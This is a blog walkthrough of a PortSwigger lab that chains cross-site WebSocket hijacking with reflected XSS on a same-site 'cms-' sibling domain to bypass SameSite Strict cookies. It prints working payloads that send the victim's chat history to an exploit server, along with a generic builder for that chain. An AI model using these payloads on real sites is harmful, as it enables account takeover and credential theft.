某不知名博客 (An Unnamed Blog)
Carsaid, "a primary-school pupil of security"

carsaid
2023-10-06
# Lab: SameSite Strict bypass via sibling domain

# Challenge

This lab's live chat feature is vulnerable to cross-site WebSocket hijacking (CSWSH). To solve the lab, log in to the victim's account.

To do this, use the provided exploit server to perform a CSWSH attack that exfiltrates the victim's chat history to the default Burp Collaborator server. The chat history contains the login credentials in clear text.

If you have not already done so, we recommend completing the WebSockets topic before attempting this lab.

Hint

Make sure you thoroughly review all of the available attack surface. Keep an eye out for additional vulnerabilities that could help you with the attack, and remember that two domains may belong to the same site.

Lab (Practitioner): SameSite Strict bypass via sibling domain >> https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain

# Walkthrough

Click "ACCESS THE LAB" to enter the lab.

(If you have not finished the WebSockets topic yet, go and complete it first, then come back to this lab.)

# Finding the cross-site WebSocket hijacking

Following the hands-on steps from the WebSockets topic, enable the Burp Suite proxy, then click "Live chat" to enter the chat room.

The WebSocket handshake request is captured. It carries no CSRF protection of any kind (nothing in the request binds the upgrade to the user beyond the session cookie), so the connection is exposed to cross-site WebSocket hijacking.

The messages exchanged on that WebSocket connection are captured as well.

Following the WebSockets topic, save the following payload on the exploit server:

```html
<script>
  // Open a WebSocket to the lab's chat endpoint from the attacker's page.
  // Replace <target site> with the lab hostname.
  var ws = new WebSocket('wss://<target site>/chat');
  ws.onopen = function (event) {
    // The lab's chat client sends READY to ask the server for the chat history.
    ws.send('READY');
  }

  ws.onmessage = function (event) {
    // Whatever the server sends back is written to the attacker's console.
    console.log(event.data);
  }
</script>
```

This establishes a WebSocket connection from the attacker's domain to the vulnerable site.

WebSocket messages from the vulnerable site arrive successfully.

One warning in the console stands out: Cookie ... rejected because it is in a ... context. In other words, the vulnerable site's cookie carries a SameSite policy, so the WebSocket connection you opened from the exploit server does not include that site's cookie.

It is because you present the cookie that the site sends you your chat history. The victim is no different: without the cookie, no chat history comes back.

Inspect the handshake request that was produced: it indeed contains no Cookie header.
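To make the missing check concrete, here is an added example (not the lab's server code, and not from the original post) of the handshake gate that `/chat` lacks. Every name in it is an assumption made up for the demonstration: the allowlisted origin, the session store and the token format. It rejects the plain exploit-server attack above (wrong origin, no cookie), and it also rejects a same-site sibling such as `cms-...`, because the Origin header is compared as a whole rather than by suffix. It cannot help against XSS on the allowlisted origin itself, which is why the lab's sibling domain matters so much.

```javascript
// Added example, not the lab's server code: the handshake gate that /chat is
// missing. Allowlist, session store and token values are assumptions.

const ALLOWED_ORIGINS = new Set(['https://lab-id.victim.example']); // exact origins only

// Constructed session store: session cookie value -> CSRF token minted for it.
const SESSIONS = new Map([['s3ss10n-victim', 'csrf-7f3a9c']]);

function parseCookies(header) {
  const jar = {};
  for (const part of (header || '').split(';')) {
    const eq = part.indexOf('=');
    if (eq > 0) jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// Decide whether an Upgrade request may become a chat socket.
// req = { url: '/chat?csrf=...', headers: { Origin, Cookie, Upgrade, ... } }
function checkHandshake(req) {
  const h = {};
  for (const [k, v] of Object.entries(req.headers || {})) h[k.toLowerCase()] = v;
  if (String(h.upgrade || '').toLowerCase() !== 'websocket') return { ok: false, reason: 'not-upgrade' };

  // 1. Browsers always send Origin on a WebSocket handshake. Compare the whole
  //    origin: a suffix match on the site would admit cms-lab-id.victim.example,
  //    which is exactly the sibling an attacker with XSS there controls.
  if (!h.origin || !ALLOWED_ORIGINS.has(h.origin)) return { ok: false, reason: 'bad-origin' };

  // 2. A session cookie must be present. SameSite=Strict already strips it on
  //    cross-site opens, so this alone fails the plain exploit-server payload.
  const expectedToken = SESSIONS.get(parseCookies(h.cookie).session);
  if (!expectedToken) return { ok: false, reason: 'no-session' };

  // 3. The CSRF token in the handshake URL must be the one minted for that
  //    session, so a forged open cannot reuse a token obtained elsewhere.
  const token = new URL(req.url, 'https://placeholder.invalid').searchParams.get('csrf');
  if (token !== expectedToken) return { ok: false, reason: 'bad-token' };
  return { ok: true };
}
```

In a real server the token comparison should be constant-time and the token should be rotated with the session; the structure (exact Origin, then cookie, then a session-bound token in the handshake) is what matters here.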

# Finding an XSS and chaining it with WebSocket hijacking

According to the lab hint, there seems to be an XSS somewhere?

Injecting an XSS payload through a WebSocket chat message gets filtered.

Then, wandering around, all I saw was a login form... a form?

A prefilled form parameter does the trick nicely. The username is reflected into the input's value attribute, so the payload first closes that attribute:

```html
"><img src=1 onerror=alert(5)>

/login?username=abc"><img src=1 onerror=alert(5)>
```

Here is a classic cross-site WebSocket hijacking payload with all newlines removed and a few small adjustments: the leading `">` breaks out of the attribute, and instead of logging to the console, every message is sent to the exploit server as `/log?data=...`, where it shows up in the exploit server's access log (the lab suggests Burp Collaborator; the access log serves the same purpose):

```html
"><script>var ws=new WebSocket('wss://<target site>/chat');ws.onopen=function(event){ws.send('READY')};ws.onmessage=function(event){var xhr=new XMLHttpRequest();xhr.open('get','https://<exploit server>/log?data='+encodeURIComponent(event.data),true);xhr.send()}</script>
```

Fill in the two hostnames, URL-encode the whole payload, and inject it into the username parameter through the form prefill:

```
/login?username=abc%22%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%77%73%3d%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27%29%3b%77%73%2e%6f%6e%6f%70%65%6e%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%77%73%2e%73%65%6e%64%28%27%52%45%41%44%59%27%29%7d%3b%77%73%2e%6f%6e%6d%65%73%73%61%67%65%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%76%61%72%20%78%68%72%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%68%72%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%64%30%30%31%30%30%34%31%64%37%31%36%39%38%34%33%35%33%36%36%66%30%31%39%30%30%30%61%33%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%64%61%74%61%3d%27%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%65%76%65%6e%74%2e%64%61%74%61%29%2c%74%72%75%65%29%3b%78%68%72%2e%73%65%6e%64%28%29%7d%3c%2f%73%63%72%69%70%74%3e
```

This runs the WebSocket attack against yourself, on the target domain itself, so the handshake is same-site and carries the cookie.

As the exploit server's access log shows, a large number of chat messages are captured. The capture works.

# Finding the sibling domain

According to the hint, there should be another domain on the same site. But I searched the whole site and simply could not find it...

So I took a small peek at the answer: when loading resources such as images or JS, you can see another domain name in the Access-Control-Allow-Origin response header???

Image resources??? By default Burp's Proxy history filter hides image, CSS and other binary responses (they are still recorded; untick them under the MIME-type filter to see them)... and on top of that the browser caches them, so they are only fetched on the very first load and never appear again afterwards...

So I cleared the browser cache and reloaded the site's home page. Well then, hidden this deep:

```
https://cms-<target site>/
```
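Rather than eyeballing every static response, this can be automated. The following is an added example (not from the original post) that walks a set of captured HTTP responses, picks out every Access-Control-Allow-Origin value naming a host other than the one the request went to, and flags the ones that are same-site with the target, which is exactly the property a SameSite=Strict bypass needs. The responses and hostnames below are constructed placeholders, not the lab's; the "last two labels" notion of a site is a heuristic that happens to be right for hostnames like these and for `*.web-security-academy.net`, and a real tool would consult the Public Suffix List.

```javascript
// Added example, not from the post: find sibling domains leaked through
// Access-Control-Allow-Origin in captured responses. Sample data is constructed.

const CAPTURED = [
  { host: 'lab-id.victim.example', path: '/resources/js/chat.js',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: text/javascript\r\n' +
         'Access-Control-Allow-Origin: https://cms-lab-id.victim.example\r\n\r\n/* js */' },
  { host: 'lab-id.victim.example', path: '/',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>' },
  { host: 'lab-id.victim.example', path: '/image/avatar.png',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n' +
         'Access-Control-Allow-Origin: https://lab-id.victim.example\r\n\r\nPNG...' },
  { host: 'lab-id.victim.example', path: '/api/time',
    raw: 'HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: *\r\nVary: Origin\r\n\r\n{}' },
  { host: 'lab-id.victim.example', path: '/resources/css/lab.css',
    raw: 'HTTP/1.1 200 OK\r\nContent-Type: text/css\r\n' +
         'Access-Control-Allow-Origin: https://cdn.thirdparty.example\r\n\r\nbody{}' },
];

// Header block of a raw response, lower-cased names; a repeated header keeps its last value.
function parseHeaders(raw) {
  const headers = {};
  const lines = raw.split('\r\n\r\n')[0].split('\r\n').slice(1); // drop the status line
  for (const line of lines) {
    const colon = line.indexOf(':');
    if (colon > 0) headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return headers;
}

// "Site" as SameSite sees it: the registrable domain. Heuristic: last two labels.
function siteOf(host) {
  return host.split('.').slice(-2).join('.');
}

// Map<origin, { sameSite, seenAt[] }> for every ACAO origin whose host differs
// from the host the request was sent to.
function findForeignAcaoOrigins(captured) {
  const found = new Map();
  for (const r of captured) {
    const acao = parseHeaders(r.raw)['access-control-allow-origin'];
    if (!acao || acao === '*' || acao === 'null') continue;   // no host to learn from
    let host;
    try { host = new URL(acao).hostname; } catch { continue; } // malformed value
    if (host === r.host) continue;                             // same origin, nothing new
    const entry = found.get(acao) || { sameSite: siteOf(host) === siteOf(r.host), seenAt: [] };
    entry.seenAt.push(r.path);
    found.set(acao, entry);
  }
  return found;
}

// Only the same-site origins are candidates for a SameSite=Strict bypass.
function siblingCandidates(captured) {
  return [...findForeignAcaoOrigins(captured)]
    .filter(([, v]) => v.sameSite)
    .map(([origin]) => origin);
}
```

Feeding it exported Burp history (host, path and raw response per item) turns the "peek at the answer" step into a one-line report; the third-party CDN origin in the sample is reported but not flagged, because it is on a different site and cannot carry the victim's cookie.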

Visiting it shows a stripped-down login form.

The form can be submitted with POST, and the username parameter you submit is included in the immediate response... included in the immediate response?

Submitting the form with GET instead does the trick nicely. No attribute breakout is needed this time, since the value lands straight in the HTML:

```
/login?username=abc<img src=1 onerror=alert(5)>&password=123
```

Originally, with only one domain, we could have done it like this, redirecting the user to the page with the XSS:

```html
<script>window.location="https://0a4200ac04d071ef849c3706004e0083.web-security-academy.net/login?username=abc%22%3e%3c%73%63%72%69%70%74%3e%76%61%72%20%77%73%3d%6e%65%77%20%57%65%62%53%6f%63%6b%65%74%28%27%77%73%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%63%68%61%74%27%29%3b%77%73%2e%6f%6e%6f%70%65%6e%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%77%73%2e%73%65%6e%64%28%27%52%45%41%44%59%27%29%7d%3b%77%73%2e%6f%6e%6d%65%73%73%61%67%65%3d%66%75%6e%63%74%69%6f%6e%28%65%76%65%6e%74%29%7b%76%61%72%20%78%68%72%3d%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%68%72%2e%6f%70%65%6e%28%27%67%65%74%27%2c%27%68%74%74%70%73%3a%2f%2f%65%78%70%6c%6f%69%74%2d%30%61%61%64%30%30%31%30%30%34%31%64%37%31%36%39%38%34%33%35%33%36%36%66%30%31%39%30%30%30%61%33%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%6c%6f%67%3f%64%61%74%61%3d%27%2b%65%6e%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%65%76%65%6e%74%2e%64%61%74%61%29%2c%74%72%75%65%29%3b%78%68%72%2e%73%65%6e%64%28%29%7d%3c%2f%73%63%72%69%70%74%3e";</script>
```

Now, instead, redirect the user to the XSS page on the sibling domain, and have the sibling domain's XSS redirect the user on to the XSS page on the main domain:

That is how the SameSite policy gets bypassed (later, looking at the answer, I found that running the attack payload directly on the sibling domain is enough; there is no need to hop over to the main domain).

```html
<script>
  // The username value below is URL-encoded once; it decodes to
  //   abc<script>window.location = "https://0a4200ac04d071ef849c3706004e0083.web-security-academy.net/login?username=abc%22%3e...";</script>
  // i.e. the sibling-domain XSS sends the browser to the main-domain XSS URL shown above,
  // whose own username parameter stays encoded for the second hop.
  window.location = "https://cms-0a4200ac04d071ef849c3706004e0083.web-security-academy.net/login?username=abc%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%20%3d%20%22%68%74%74%70%73%3a%2f%2f%30%61%34%32%30%30%61%63%30%34%64%30%37%31%65%66%38%34%39%63%33%37%30%36%30%30%34%65%30%30%38%33%2e%77%65%62%2d%73%65%63%75%72%69%74%79%2d%61%63%61%64%65%6d%79%2e%6e%65%74%2f%6c%6f%67%69%6e%3f%75%73%65%72%6e%61%6d%65%3d%61%62%63%25%32%32%25%33%65%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%25%37%36%25%36%31%25%37%32%25%32%30%25%37%37%25%37%33%25%33%64%25%36%65%25%36%35%25%37%37%25%32%30%25%35%37%25%36%35%25%36%32%25%35%33%25%36%66%25%36%33%25%36%62%25%36%35%25%37%34%25%32%38%25%32%37%25%37%37%25%37%33%25%37%33%25%33%61%25%32%66%25%32%66%25%33%30%25%36%31%25%33%34%25%33%32%25%33%30%25%33%30%25%36%31%25%36%33%25%33%30%25%33%34%25%36%34%25%33%30%25%33%37%25%33%31%25%36%35%25%36%36%25%33%38%25%33%34%25%33%39%25%36%33%25%33%33%25%33%37%25%33%30%25%33%36%25%33%30%25%33%30%25%33%34%25%36%35%25%33%30%25%33%30%25%33%38%25%33%33%25%32%65%25%37%37%25%36%35%25%36%32%25%32%64%25%37%33%25%36%35%25%36%33%25%37%35%25%37%32%25%36%39%25%37%34%25%37%39%25%32%64%25%36%31%25%36%33%25%36%31%25%36%34%25%36%35%25%36%64%25%37%39%25%32%65%25%36%65%25%36%35%25%37%34%25%32%66%25%36%33%25%36%38%25%36%31%25%37%34%25%32%37%25%32%39%25%33%62%25%37%37%25%37%33%25%32%65%25%36%66%25%36%65%25%36%66%25%37%30%25%36%35%25%36%65%25%33%64%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%39%25%37%62%25%37%37%25%37%33%25%32%65%25%37%33%25%36%35%25%36%65%25%36%34%25%32%38%25%32%37%25%35%32%25%34%35%25%34%31%25%34%34%25%35%39%25%32%37%25%32%39%25%37%64%25%33%62%25%37%37%25%37%33%25%32%65%25%36%66%25%36%65%25%36%64%25%36%35%25%37%33%25%37%33%25%36%31%25%36%37%25%36%35%25%33%64%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%39%25%37%62%25%37%36%25%36%31%25%37%32%25%32%30%25%37%38%25%36%38%25%37%32%25%33%64%25%36%65%25%36%35%25%37%37%25%32%30%25%35%38%25%34%64%25%34%63%25%34%38%25%37%34%25%37%34%25%37%30%25%35%32%25%36%35%25%37%31%25%37%35%25%36%35%25%37%33%25%37%34%25%32%38%25%32%39%25%33%62%25%37%38%25%36%38%25%37%32%25%32%65%25%36%66%25%37%30%25%36%35%25%36%65%25%32%38%25%32%37%25%36%37%25%36%35%25%37%34%25%32%37%25%32%63%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%37%33%25%33%61%25%32%66%25%32%66%25%36%35%25%37%38%25%37%30%25%36%63%25%36%66%25%36%39%25%37%34%25%32%64%25%33%30%25%36%31%25%36%31%25%36%34%25%33%30%25%33%30%25%33%31%25%33%30%25%33%30%25%33%34%25%33%31%25%36%34%25%33%37%25%33%31%25%33%36%25%33%39%25%33%38%25%33%34%25%33%33%25%33%35%25%33%33%25%33%36%25%33%36%25%36%36%25%33%30%25%33%31%25%33%39%25%33%30%25%33%30%25%33%30%25%36%31%25%33%33%25%32%65%25%36%35%25%37%38%25%37%30%25%36%63%25%36%66%25%36%39%25%37%34%25%32%64%25%37%33%25%36%35%25%37%32%25%37%36%25%36%35%25%37%32%25%32%65%25%36%65%25%36%35%25%37%34%25%32%66%25%36%63%25%36%66%25%36%37%25%33%66%25%36%34%25%36%31%25%37%34%25%36%31%25%33%64%25%32%37%25%32%62%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35%25%35%35%25%35%32%25%34%39%25%34%33%25%36%66%25%36%64%25%37%30%25%36%66%25%36%65%25%36%35%25%36%65%25%37%34%25%32%38%25%36%35%25%37%36%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%31%25%37%34%25%36%31%25%32%39%25%32%63%25%37%34%25%37%32%25%37%35%25%36%35%25%32%39%25%33%62%25%37%38%25%36%38%25%37%32%25%32%65%25%37%33%25%36%35%25%36%65%25%36%34%25%32%38%25%32%39%25%37%64%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65%22%3b%3c%2f%73%63%72%69%70%74%3e&password=123";
</script>
```
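The hand-assembled blobs above (the prefilled-username payload earlier and the exploit-server redirect here) are easy to get wrong, since each layer has to be encoded once for the layer outside it. The following is an added example, not the author's or PortSwigger's code, that builds the same chain mechanically: layer 1 is the CSWSH script that has to execute on a same-site origin, layer 2 wraps it into the reflected-XSS login URL on the `cms-` sibling (which echoes the username straight into the body, so a single URL-encoding pass is enough), and layer 3 is the page saved on the exploit server. It follows the shorter route from the answer, running the payload directly on the sibling domain rather than hopping to the main domain. The hostnames are placeholders, not the lab's.

```javascript
// Added example, not from the post: build the exploit-server page, the
// sibling-domain XSS URL and the CSWSH script it carries, layer by layer.
// Hostnames are placeholders for the lab's real values.

const LAB = 'lab-id.victim.example';            // hosts wss://<LAB>/chat
const EXPLOIT = 'exploit-id.attacker.example';  // its access log receives /log?data=...

// Layer 1: the script that must run on a same-site origin so the browser
// attaches the SameSite=Strict session cookie to the WebSocket handshake.
function cswshScript(labHost, exploitHost) {
  return `<script>var ws=new WebSocket('wss://${labHost}/chat');` +
    `ws.onopen=function(){ws.send('READY')};` +
    `ws.onmessage=function(e){var x=new XMLHttpRequest();` +
    `x.open('get','https://${exploitHost}/log?data='+encodeURIComponent(e.data),true);x.send()}` +
    `</script>`;
}

// Layer 2: the cms- sibling reflects ?username= unencoded into the page body,
// so one encodeURIComponent pass is exactly what the server will undo.
function xssUrl(labHost, exploitHost) {
  return `https://cms-${labHost}/login?username=` +
    'abc' + encodeURIComponent(cswshScript(labHost, exploitHost)) +
    '&password=123';
}

// Layer 3: the page saved on the exploit server. A cross-site top-level
// navigation sends no Strict cookie, but the login page needs none; once the
// reflected script runs it is a first-party document on the victim's site.
function exploitPage(labHost, exploitHost) {
  return `<script>window.location=${JSON.stringify(xssUrl(labHost, exploitHost))};</script>`;
}

// What the sibling's /login handler sees after decoding the query string.
function decodeXssUrl(url) {
  return new URL(url).searchParams.get('username');
}
```

Swap `LAB` and `EXPLOIT` for the real hostnames and paste `exploitPage(LAB, EXPLOIT)` into the exploit server's body; to exfiltrate to Burp Collaborator as the lab text suggests, point `exploitHost` at the Collaborator payload instead, since the script only needs a host that logs incoming requests.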

Save the payload.

(An animated screenshot of the attack process was shown here.)

Deliver the payload to the victim user. After a short wait, the victim's chat history is captured.

It contains the username carlos and the password 5lx879bsbzdka1bqww62.

Open the login page and log in with the captured username and password.

Login succeeds and the lab is solved.
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License